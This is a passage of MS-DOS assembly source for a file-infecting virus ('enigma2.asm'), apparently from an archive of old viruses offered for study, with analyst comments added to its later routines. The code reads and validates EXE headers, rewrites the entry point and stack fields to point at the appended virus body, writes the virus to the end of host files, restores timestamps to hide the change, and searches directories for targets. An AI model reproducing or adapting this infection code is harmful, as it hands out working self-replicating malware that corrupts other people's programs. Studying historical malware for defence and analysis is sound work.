
📄 enigma2.asm

📁 More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use
💻 ASM
	jmp	append_ok
	
set_new_data:
	push	bx
	push	dx
	mov	dx,offset buffer.new_data
	sub	dx,adjust
	add	dx,bx
	mov	si,offset buffer.handle
	sub	si,adjust
	add	si,bx
	mov	bx,[si]				;Load handle
	mov	cx,001bh			;Read formatted exe header
	mov	ax,3f00h
	int	21h				;Read function call
	pop	dx
	pop	bx
	jnc	read_header
	jmp	append_ok

read_header:
	nop					;some code to modify header
						;
			
	mov	si,offset buffer.pointer5
	sub	si,adjust
	add	si,bx
	mov	ax,[si]
	add	si,2
	add	ax,0ch
	adc	word ptr [si],0000h
	sub	si,2
	mov	[si],ax			;This code restores original
					;filelength
			
	mov	si,offset buffer.new_data
	sub	si,adjust
	add	si,bx
	mov	ax,[si]
	cmp	ax,5a4dh		;check for valid exe file
	jz	valid_exe
	jmp	append_ok
	
valid_exe:
	mov	ax,[si+8]		;Load module size
	xor	dx,dx
	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1			;Multiply by 16
	
	push	ax
	push	dx			;Adjust new size
	push	cx
	mov	dx,virussize-896+64
	push	dx
	mov	cx,0009h
	shr	dx,cl
	add	word ptr [si+4],dx
	pop	dx
	and	dx,01ffh
	add	dx,word ptr [si+2]
	cmp	dx,512
	jl	adjust_okay
	sub	dx,512
	inc	word ptr [si+4]
adjust_okay:
	mov	word ptr [si+2],dx	
	pop	cx
	pop	dx
	pop	ax
	

	push	si			;This SI is very useful so save it
							
	mov	si,offset buffer.pointer5
	sub	si,adjust
	add	si,bx
	sub	[si],ax
	mov	ax,[si]
	sbb	[si+2],dx
	mov	dx,[si+2]		;the byte size of the load module
			

	pop	si
	push	ax
	push	dx
	mov	ax,[si+14h]
	mov	dx,[si+16h]		;Get CS:IP value
	mov	cx,[si+0eh]		;Get SS value
	push	si
	mov	si,offset buffer.IP_save
	sub	si,adjust
	add	si,bx
	xchg	[si],ax
	xchg	[si+2],dx
	mov	si,offset buffer.SS_save
	sub	si,adjust
	add	si,bx
	xchg	[si],cx
	mov	si,offset buffer.ip_old
	sub	si,adjust
	add	si,bx
	mov	[si],ax
	mov	[si+2],dx
	mov	si,offset buffer.ss_old
	sub	si,adjust
	add	si,bx
	mov	[si],cx
	pop	si
	pop	dx
	pop	ax
	
	push	ax
	push	dx
	
	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1			;Multiply by 16
	
	mov	cx,0008h
	shl	dx,cl
	mov	cx,0004h
	shr	ax,cl			;A very obscure algorithm to make
					;a segment:offset pair
	mov	[si+14h],ax
	mov	[si+16h],dx		;Infected values

	push	si
	mov	si,offset buffer.far_push
	sub	si,adjust
	add	si,bx
	xchg	[si],dx
	mov	word ptr [si+2],dx
	pop	si
		
	pop	dx
	pop	ax
	add	ax,virussize		;
	adc	dx,0000h

	mov	cx,0003h	
mul_loop:

	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1
	shl	ax,1
	rcl	dx,1			;Multiply by 4096
	loop	mul_loop
				
	or	ax,ax
	jz	exact_value
	inc	dx
exact_value:	
	mov	[si+0eh],dx		;Infected stack segment 
		
					;Write back infected header
	push	si
	push	bx
	mov	si,offset buffer.handle
	sub	si,adjust
	add	si,bx
	mov	bx,[si]
	mov	ax,5700h		;Get time function
	int	21h
	pop	bx
	pop	si
	jnc	correct_time
	jmp	append_ok1
	
correct_time:
	push	cx
	push 	bx
	push	dx
	mov	si,offset buffer.handle
	sub	si,adjust
	add 	si,bx
	mov	bx,[si]
	xor	cx,cx
	xor	dx,dx
	mov	ax,4200h			;From beginning of file
	int	21h				;Lseek function call
	pop	dx
	pop	bx
	pop	cx
	jnc	continue_infection
	jmp	append_ok1
	
continue_infection:
	
	push	cx
	push	dx
	push	bx
	mov	dx,offset buffer.new_data
	sub	dx,adjust
	add	dx,bx
	mov	si,offset buffer.handle
	sub	si,adjust
	add	si,bx
	mov	bx,[si]				;Load handle
	mov	cx,001bh			;Write infected exe header
	mov	ax,4000h
	int	21h				;Write function call
	pop	bx
	pop	dx
	pop	cx
	jnc	glue_virus
	jmp	append_ok1

glue_virus:
							
	push	cx
	push 	bx
	push	dx
	mov	si,offset buffer.handle
	sub	si,adjust
	add 	si,bx
	mov	bx,[si]
	xor	cx,cx
	xor	dx,dx
	mov	ax,4202h			;From the end of file
	int	21h				;Lseek function call
	pop	dx
	pop	bx
	pop	cx
	jnc	write_data
	jmp	append_ok1
	
write_data:
	
	mov	si,offset buffer.handle
	sub	si,adjust
	add	si,bx
	
	push	dx
	push	cx
	
	mov	dx,bx
	sub	dx,3				;The starting three byte
						;call instruction
	push	es
	push	bx
	push	dx
	push	si
	mov	ax,2f00h
	int	21h
	pop	si
	pop	dx
	
	push	es
	push	bx
	
	push	si
	mov	ax,1a00h
	int	21h
	pop	si
	
							
	mov	bx,[si]				;Load handle
	mov	cx,virussize-896+64		;Length of virus obtained
	mov	ax,4000h			;with dir
	int	21h
	lahf					;Write function call

	pop	bx
	pop	es
	
	push	ds
	push	es
	pop	ds
	mov	dx,bx
	push	ax
	mov	ax,1a00h
	int	21h
	pop	ax
	
	pop	ds
	pop	bx
	pop	es
	
	pop	cx
	pop	dx
	
	sahf
	jnc	put_stamp			;Error or not file
	jmp	append_ok1			;is closed	
	
put_stamp:
	push	bx
	mov	si,offset buffer.handle
	sub	si,adjust
	add	si,bx
	mov	bx,[si]
	mov	ax,5701h		;Set time function
	int	21h
	pop	bx

append_ok1:

	mov	si,offset buffer.ip_old	;Restore previous CS:IP values
	sub	si,adjust
	add	si,bx
	mov	ax,[si]
	mov	dx,[si+2]
	mov	si,offset buffer.IP_save
	sub	si,adjust
	add	si,bx
	mov	[si],ax
	mov	[si+2],dx	

	mov	si,offset buffer.save_push
	sub	si,adjust
	add	si,bx
	mov	ax,[si]
	mov	word ptr [si-2],ax
	
	mov	si,offset buffer.ss_old
	sub	si,adjust
	add	si,bx
	mov	ax,[si]
	mov	si,offset buffer.SS_save
	sub	si,adjust
	add	si,bx
	mov	word ptr [si],ax
		
		
append_ok:
	mov	si,offset buffer.help_flag
	sub	si,adjust
	add	si,bx
	mov	ax,[si]
	add 	si,2
	mov	[si],ax			;This code effectively moves
					;help_flag into where_from_flag 

		
	jmp	close_error			;
	
error_exit:
	mov	si,offset buffer.pointer3
	sub	si,adjust
	add	si,bx
	mov	dx,[si]			;Restore original DTA
	add	si,2
	mov	ax,[si]
	push	ds
	mov	ds,ax
	mov	ax,1a00h		;Set DTA function call
	int	21h
	pop	ds
	pop	di
	pop	si
	pop	dx
	pop	cx
	pop	bx
	pop	ax
	ret		
	
try_to_infect	ENDP
								
;-----------------------------------------------------------------------
; transfer_filespec
; Copies the ASCIIZ string stored at buffer.filematch to the destination
; the caller has placed in ES:DI, by handing the source address to
; byte_move.
; In:    BX = run-time base added to every data reference
;             (presumably the address captured by setup_data; the call
;             sites are outside this excerpt -- confirm)
;        ES:DI = destination (consumed by byte_move's STOSB)
; Out:   nothing; SI is preserved
; Analyst note: the "offset - adjust + bx" sequence below recurs for every
; data access in this file. It converts an assemble-time offset into the
; address the data has at run time, which is what lets the code run from
; an arbitrary position inside a host file.
;-----------------------------------------------------------------------
transfer_filespec 	PROC

	push	si				;SI is the caller's; keep it intact
	mov	si,offset buffer.filematch 	;Source = stored file-match pattern
						;(assemble-time offset)
	sub	si,adjust			;Remove the assemble-time bias
	add	si,bx				;Add the run-time base
	call	byte_move			;Copy DS:SI -> ES:DI up to the NUL
	pop	si
	ret	

transfer_filespec 	ENDP

;-----------------------------------------------------------------------
; search_all
; Same shape as transfer_filespec, but the source string is
; buffer.matchall, which the author's comment identifies as '*.*'.
; In:    BX = run-time base for data references
;        ES:DI = destination (consumed by byte_move's STOSB)
; Out:   nothing; SI is preserved
;-----------------------------------------------------------------------
search_all 	PROC

	push	si				;Preserve the caller's SI
	mov	si,offset buffer.matchall	;This is the '*.*' filename
	sub	si,adjust			;Remove the assemble-time bias
	add	si,bx				;Add the run-time base
	call	byte_move			;Copy DS:SI -> ES:DI up to the NUL
	pop	si
	ret	
	
search_all 	ENDP
	
;-----------------------------------------------------------------------
; byte_move
; Copies bytes from DS:SI to ES:DI until a zero byte has been copied
; (the terminator itself is stored too).
; In:    DS:SI = source ASCIIZ string, ES:DI = destination
; Out:   AX and DI restored to their entry values; SI is left pointing
;        past the terminator (the callers in this file save SI
;        themselves); the direction flag is left cleared
; NOTE(review): there is no length limit -- the loop stops only on a zero
; byte, so the destination must be large enough for whatever the source
; holds. Nothing in this routine checks that.
;-----------------------------------------------------------------------
byte_move	PROC

	push	ax
	push	di				;Saved so the caller's DI still
						;points at the start of the copy

	cld					;Forward direction for LODSB/STOSB

move_loop:
	lodsb					;AL = [DS:SI], SI++
	stosb					;[ES:DI] = AL, DI++
	or	al,al				;The string to move is ASCIIZ
	jne	move_loop			;Loop until the zero byte was stored
	pop	di
	pop	ax
	ret	
	
byte_move	ENDP
	
;-----------------------------------------------------------------------
; find_first
; Sets the DOS Disk Transfer Area to a private buffer and then issues
; int 21h AH=4Eh (find first) with DS:DX pointing at buffer.buffer1.
; In:    BX = run-time base for data references
;        DX = 0 to start from buffer.buffer2, otherwise a DTA offset
;             from an earlier call
; Out:   DX = the DTA offset that was set (input, or relocated
;             buffer.buffer2, plus 2Bh)
;        AX and flags as left by the find-first call (the POPs below do
;        not change flags, so the caller can test carry)
;        CX and BX preserved
; NOTE(review): 2Bh is 43, the size of a DOS find-first DTA record, so
; each call presumably advances to the next record slot to allow nested
; directory searches -- confirm against the callers. Note that with
; DX = 0 the first DTA is placed at buffer2 + 2Bh, not at buffer2.
; Nothing here bounds how far DX may advance.
;-----------------------------------------------------------------------
find_first	PROC

	push	cx
	push	bx
	cmp	dx,0000h
	jnbe	over_set				;DX non-zero: caller supplied a DTA
	mov	dx,offset buffer.buffer2		;Set Data Transfer Area
	sub	dx,adjust				;or Disk Transfer area
	add	dx,bx					;
over_set:
	add	dx,02Bh					;Step to the next 43-byte slot
	mov	cx,00010h				;Attribute byte for 
							;directory search
	mov	ah,01ah
	int	021h					;Set DTA function call
	
	pop	bx					;Reload the saved run-time base
	push	bx					;and keep it saved for the exit
	push	dx					;Keep the DTA offset to return it
	mov	dx,offset buffer.buffer1		;DS:DX = search file spec
	sub	dx,adjust
	add	dx,bx
	mov	ah,04eh				;find first
						;function call
	int	021h
	pop	dx				;DX = DTA offset set above
	pop	bx
	pop	cx
	ret	
	
find_first	ENDP
	
;-----------------------------------------------------------------------
; find_next
; Issues int 21h AH=4Fh (find next) to continue the search recorded in
; the current DTA.
; In:    BX = run-time base for data references
; Out:   AX and flags as left by the DOS call (the POPs do not change
;        flags); CX, BX and DX preserved
; NOTE(review): DOS function 4Fh takes its state from the current DTA;
; the DX and CX loads below mirror find_first and are presumably not
; needed by the call itself.
;-----------------------------------------------------------------------
find_next 	PROC

	push	cx
	push	bx
	push	dx
	mov	dx,offset buffer.buffer1	;Same file-spec address as find_first
	sub	dx,adjust
	add	dx,bx
	mov	cx,00010h			;Directory attribute, as in find_first
	mov	ah,04fh				;Find next function call
	int	021h
	pop	dx
	pop	bx
	pop	cx
	ret	

find_next 	ENDP

;-----------------------------------------------------------------------
; ask_question
; By its name and operands this is meant to show the text at
; buffer.question and then wait for a key (int 16h with AH=0).
; No call to it is visible in this excerpt.
; NOTE(review), reading the code as written:
;  - AX is loaded with 0009h, so AH=00h and AL=09h when int 21h runs.
;    In DOS, AH=00h is "terminate program"; the display-string function
;    is AH=09h. As written the routine would therefore end the running
;    program rather than print anything.
;  - buffer.question is used as a plain assemble-time offset, without the
;    "sub adjust / add bx" fix-up applied to every other buffer reference
;    in this file.
;  - There is no RET before ENDP, so if control ever returned from the
;    two interrupts it would continue into setup_data.
; These points matter when matching observed behaviour to this listing.
;-----------------------------------------------------------------------
ask_question    PROC

        mov     dx,offset buffer.question	;Not relocated (see note above)
        mov     ax,09				;AH=00h, AL=09h
        int     21h
        xor     ax,ax				;AH=0: BIOS read-key service
        int     16h

ask_question    ENDP


;-----------------------------------------------------------------------
; setup_data
; Returns in BX the near return address of its own caller, i.e. the
; run-time offset of the instruction that follows "call setup_data".
; In:    reached by a near CALL
; Out:   BX = return address; stack unchanged on exit
; Analyst note: this call/pop pair is how the code learns where it is
; running. Together with the "offset - adjust + bx" fix-ups used by the
; other routines it makes the body position-independent, which is a
; recognisable trait when triaging appended-code samples of this era.
;-----------------------------------------------------------------------
setup_data:
	cli				;Presumably: keep interrupts from using
					;the stack while the word is popped
	pop	bx			;This will catch instruction pointer 
	push	bx			;Put the return address back
	sti				;value and after that restore stack
	ret				;pointer value		


;One instance of the data_area structure (declared outside this excerpt),
;placed after the code. Every "buffer.xxx" reference in the routines
;above is a field of this instance.
buffer	data_area	<>		;Reserve data_area space

        code    ends			;End of the code segment
	END 	start			;Entry point is the label "start"
